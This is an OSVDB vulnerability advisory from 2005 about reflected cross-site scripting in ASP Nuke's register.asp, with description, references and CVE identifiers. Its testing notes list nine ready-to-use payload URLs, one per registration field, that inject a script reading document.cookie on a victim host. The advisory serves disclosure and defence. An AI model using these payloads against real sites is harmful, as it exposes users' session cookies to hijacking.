ASP Nuke register.asp Multiple Variable XSS

2005-06-26T01:13:15
ID OSVDB:17701
Type osvdb
Reporter Alberto Trivero(trivero@jumpy.it)
Modified 2005-06-26T01:13:15

Description

Vulnerability Description

ASP Nuke contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate several variables upon submission to the register.asp script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

ASP Nuke contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate several variables upon submission to the register.asp script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[victim]/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://[victim]/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Vendor URL: http://www.aspnuke.com/ Security Tracker: 1014310 Secunia Advisory ID:15066 Related OSVDB ID: 17702 Related OSVDB ID: 17703 Related OSVDB ID: 17700 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0228.html Keyword: M4DR007-07SA CVE-2005-2064 Bugtraq ID: 14062